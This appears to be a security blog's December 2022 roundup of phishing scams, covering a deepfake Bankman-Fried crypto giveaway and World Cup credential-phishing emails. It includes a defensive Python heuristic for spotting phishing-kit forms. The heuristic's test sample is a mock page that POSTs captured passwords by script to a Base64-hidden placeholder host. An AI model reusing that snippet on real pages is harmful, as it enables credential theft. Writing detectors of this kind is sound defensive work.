Catches of the Month: Phishing Scams for December 2022

Welcome to our December 2022 review of phishing attacks, in which we explore the latest email scams and the tactics that cyber criminals use to trick people into handing over personal data.

This month, we delve into a scheme capitalising on the fall of FTX and review a scam exploiting people’s excitement over the World Cup.

FTX customers offered refund in deepfake phishing scam

Somehow, things are getting even worse for FTX. The cryptocurrency exchange platform spiralled into bankruptcy last month, after a revelation that its partner firm, Alameda Research, held a significant portion of its assets in FTX’s native token FTT.

That leak caused rival exchange Binance to announce that it would sell its holdings in FTT. It created a huge spike in customer withdrawals that FTX couldn’t meet, resulting in its sudden collapse.

Binance initially signed a letter of intent to acquire the firm to ensure that customers could recover their assets from FTX, but the exchange withdrew its offer after it learned that the firm mishandled customer funds and is facing regulatory investigation.

The chaos has made FTX users justifiably eager to receive compensation, and that has opened the door for scammers.

On Friday, a deepfake video emerged on Twitter that appeared to show FTX founder Sam Bankman-Fried offering an opportunity for users to recoup their losses.

“Hello everyone. As you know our FTX exchange is going bankrupt,” the deepfake of Bankman-Fried said.

“But I hasten to inform all users that you should not panic. As compensation for the loss we have prepared a giveaway for you in which you can double your cryptocurrency. To do this, just go to the site”

Users who follow the link are redirected to a website that reads: “Biggest giveaway crypto of $100,000,000.

“Send the desired number of coins to the special address below. Once we receive your transaction, we will immediately send the requested amount back to you. You can only take part in our giveaway once. Hurry up!”

To compound matters, the video was posted from a Twitter account that fully replicated Bankman-Fried’s, thanks to the site’s recent blue-checkmark fiasco which allowed anyone to verify themselves if they paid a subscription fee.

The account, which belongs to the now-suspended Twitter user “s4ge_ETH”, was verified, had Bankman-Fried’s handle “SBF” and his Twitter avatar.

The video directed viewers to visit a website where they could enter a giveaway to win cryptocurrency. These are common scams and are often run using accounts that impersonate celebrities – although the use of deepfake footage takes this to another level.

However, such schemes could occur more often as deepfake technology becomes more sophisticated and widely accessible. There are already websites and apps that people can use to doctor videos, and many people remain unaware of the existence of the technology, which could make it a powerful weapon in fraudsters’ arsenal.

Watch out for World Cup phishing emails

Scammers are always looking for current events they can use to lend their schemes a sense of legitimacy. With the World Cup currently taking place, it shouldn’t come as a surprise to see a spate of phishing campaigns using the tournament as a pretext.

A series of phishing emails were discovered by the security firm Trellix. In one, the email appeared to come from the FIFA TMS (transfer matching system) helpdesk and claimed that the recipient’s two-factor authentication mechanism had been turned off.

The email contained a link that redirected the user to a bogus website that was designed to capture their login credentials.

Source: Trellix

Another scam impersonated Auckland City FC manager David Firisua, who was supposedly seeking confirmation of a payment made to the recipient related to FIFA. Other phishing emails impersonate FIFA’s ticketing office, WeTransfer and Snoonu, the official food delivery partner of the World Cup.

Trellix also found bogus web pages that look like legitimate FIFA content, and warned people that scammers are using “multiple phishing kits where the post URL is either obfuscated, Base64 encoded or present in the ajax request instead of form action tags”.
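A triage heuristic for the hiding techniques Trellix describes, as an added example (not Trellix's or this article's code): it statically checks a saved page for a password form with no real action, a script-based submission and Base64 text that decodes to a URL. The sample pages and the `collector.example` host are constructed for illustration.

```python
import base64
import re
from html.parser import HTMLParser

class FormScan(HTMLParser):
    """Record each form's action and whether it contains a password field."""
    def __init__(self):
        super().__init__()
        self.forms = []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": (a.get("action") or "").strip(), "password": False})
        elif tag == "input" and (a.get("type") or "").lower() == "password" and self.forms:
            self.forms[-1]["password"] = True

B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
SCRIPT_POST = re.compile(r"\$\.(?:ajax|post)\s*\(|\bfetch\s*\(|XMLHttpRequest")

def decoded_urls(html):
    """Return URLs present in the page only as Base64 text."""
    urls = []
    for run in B64_RUN.findall(html):
        try:
            text = base64.b64decode(run, validate=True).decode("ascii")
        except ValueError:  # covers bad padding and non-ASCII output
            continue
        if text.lower().startswith(("http://", "https://")):
            urls.append(text)
    return urls

def analyse(html):
    """List signs that a credential form hides where its data is sent."""
    scan = FormScan()
    scan.feed(html)
    has_pw = any(f["password"] for f in scan.forms)
    findings = ["password form without a real action" for f in scan.forms
                if f["password"] and f["action"].lower() in ("", "#", "javascript:void(0)")]
    if has_pw and SCRIPT_POST.search(html):
        findings.append("credentials sent by script request")
    findings += ["base64-encoded URL: " + u for u in decoded_urls(html)]
    return findings

# Constructed samples, not taken from a real kit; collector.example is a placeholder.
HIDDEN = base64.b64encode(b"https://collector.example/post.php").decode()
KIT_PAGE = ('<form id="f" action="#"><input name="u"><input type="password" name="p"></form>'
            '<script>var d=atob("' + HIDDEN + '");'
            '$.ajax({type:"POST",url:d,data:$("#f").serialize()});</script>')
PLAIN_PAGE = '<form action="/session" method="post"><input type="password" name="p"></form>'

if __name__ == "__main__":
    for name, page in (("kit", KIT_PAGE), ("plain", PLAIN_PAGE)):
        print(name, analyse(page))
```

Legitimate single-page applications also submit logins by script, so treat a hit as a reason to inspect the decoded destination rather than as a verdict.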

Although the final of this year’s World Cup is only a week or so away, Trellix doesn’t believe that the phishing attacks will stop as soon as the tournament ends.

It said that the scams could continue to run through to next year, and warned that organisations directly related to the tournament should remain “extra-vigilant”.

Can you spot a scam?

All organisations are vulnerable to phishing, no matter their size or sector, so it’s essential to understand how you might be targeted and what you can do to prevent a breach.

You can help educate your staff with IT Governance’s Phishing Staff Awareness Training Programme.

This 45-minute course uses real-world examples like the ones we’ve discussed here to explain how phishing attacks work, the tactics that cyber criminals use and how you can detect malicious emails.